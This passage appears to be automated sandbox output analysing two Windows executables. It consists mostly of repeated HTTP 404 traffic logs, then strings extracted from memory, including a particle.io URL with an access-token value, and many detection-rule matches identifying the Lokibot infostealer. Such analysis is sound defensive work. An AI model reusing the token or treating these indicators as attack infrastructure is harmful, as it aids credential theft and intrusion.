                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: Scan copy.exe, 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, vLQwEscoQr.exe, 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: vLQwEscoQr.exe, vLQwEscoQr.exe, 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: Scan copy.exe, vLQwEscoQr.exe.0.drString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac

                System Summary

                barindex
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
